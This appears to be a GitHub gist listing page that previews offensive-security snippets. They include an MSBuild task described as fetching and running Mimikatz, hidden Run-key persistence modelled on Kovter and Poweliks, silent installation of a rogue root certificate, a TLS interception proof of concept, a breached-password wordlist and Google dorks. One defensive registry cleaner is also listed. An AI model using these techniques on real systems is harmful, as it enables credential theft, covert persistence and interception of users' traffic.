@cephurs
cephurs / vMetaDate.sh
Created July 23, 2017 12:06 — forked from cryptolok/vMetaDate.sh
small tool to retrieve vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)
#!/bin/bash
# small tool to retrieve vk.com (vkontakte) users hidden metadata (state, access, dates, counts, etc) anonymously (without login)
# sudo apt install curl
parse(){
local IFS=\>
read -d \< CELL VALUE
}
@cephurs
cephurs / katz.xml
Created July 27, 2017 23:18
Downloads Mimikatz From GitHub, Executes Inside of MsBuild.exe
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<!-- This inline task executes c# code. -->
<!-- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\msbuild.exe katz.xml -->
<Target Name="Hello">
<SharpLauncher >
</SharpLauncher>
</Target>
<UsingTask
TaskName="SharpLauncher"
TaskFactory="CodeTaskFactory"
@cephurs
cephurs / EQgroup.md
Created August 3, 2017 01:49 — forked from bontchev/EQgroup.md
Curated list of links describing the leaked Equation Group tools for Windows

Links describing the leaked EQ Group tools for Windows

Repositories and ports

Installation and usage guides

@cephurs
cephurs / check
Created November 11, 2017 14:29 — forked from 83leej/check
just a simple script that grabs two files if they are currently not there, allows checking for IP ranges by providing a simple name such as 'godaddy' or 'digitalocean', it then returns the results and provides a file named rangelist with the found ranges.
#!/bin/bash
NAMETOCHECK=$1
if [ ! -d asninfo ]; then
mkdir asninfo;
echo "Created: asninfo/";
fi
if [ ! -f asninfo/data-used-autnums.txt ]; then
@cephurs
cephurs / breachcompilation.txt
Created December 19, 2017 14:44
1.4 billion password breach compilation wordlist
wordlist created from original 41G stash via:
grep -rohP '(?<=:).*$' | uniq > breachcompilation.txt
Then, compressed with:
7z a breachcompilation.txt.7z breachcompilation.txt
Size:
@cephurs
cephurs / PSReflect-RegHide.ps1
Created January 3, 2018 13:54 — forked from brianreitz/PSReflect-RegHide.ps1
PowerShell script to hide a Run key like Reghide/Kovter/Poweliks
# requires PSReflect.ps1 to be in the same directory as this script
. .\PSReflect.ps1
$Module = New-InMemoryModule -ModuleName RegHide
# Define our structs.
# https://msdn.microsoft.com/en-us/library/windows/hardware/ff564879(v=vs.85).aspx
# typedef struct _UNICODE_STRING {
# USHORT Length;
# USHORT MaximumLength;
@cephurs
cephurs / PSReflect-RegKeyFixer.ps1
Created January 3, 2018 13:55 — forked from brianreitz/PSReflect-RegKeyFixer.ps1
A port of Joakim Schicht's RegKeyFixer using PSReflect. Will find and delete "hidden" value entries created by PSReflect-RegHide.ps1
# A port of Joakim Schicht's RegKeyFixer in PowerShell.
# https://github.com/jschicht/RegKeyFixer
#
# This script will recursively search keys starting from the Keyname
# for any value entry names with null characters
# Example usage:
# $SID = [System.Security.Principal.WindowsIdentity]::GetCurrent().User.Value
# $KeyName = "\Registry\User\$SID\SOFTWARE\Microsoft\Windows\CurrentVersion"
# $Results = Get-HiddenNames -KeyName $KeyName
# $Results | Remove-HiddenNames
@cephurs
cephurs / google-dorks
Created January 13, 2018 03:35 — forked from clarketm/google-dorks
Listing of a number of useful Google dorks.
" _ _ "
" _ /|| . . ||\ _ "
" ( } \||D ' ' ' C||/ { % "
" | /\__,=_[_] ' . . ' [_]_=,__/\ |"
" |_\_ |----| |----| _/_|"
" | |/ | | | | \| |"
" | /_ | | | | _\ |"
It is all fun and games until someone gets hacked!
@cephurs
cephurs / script.ps1
Created January 24, 2018 08:13
Hooking MessageBox For No-Prompt Trusted Root Certificate Install
#Verify Not Present
( Get-ChildItem Cert:\CurrentUser\Root | Where-Object {$_.Subject -match "__Interceptor_Trusted_Root" })
#Import-Certificate
( Get-ChildItem -Path C:\Test\thing.cer ) | Import-Certificate -CertStoreLocation cert:\CurrentUser\Root
#Prompted
Remove-Item -Path cert:\CurrentUser\Root\5C205339AE9FA846FA99D3FFF0CDEE65EB8D8E99
@cephurs
cephurs / InterceptorThing.ps1
Created January 24, 2018 18:39
Interceptor - Normal User No Admin Required.
<#
.SYNOPSIS
This script demonstrates the ability to capture and tamper with Web sessions.
For secure sessions, this is done by dynamically writing certificates to match the requested domain.
This is only proof-of-concept, and should be used cautiously, to demonstrate the effects of such an attack.
Function: Interceptor
Author: Casey Smith, Twitter: @subTee
License: BSD 3-Clause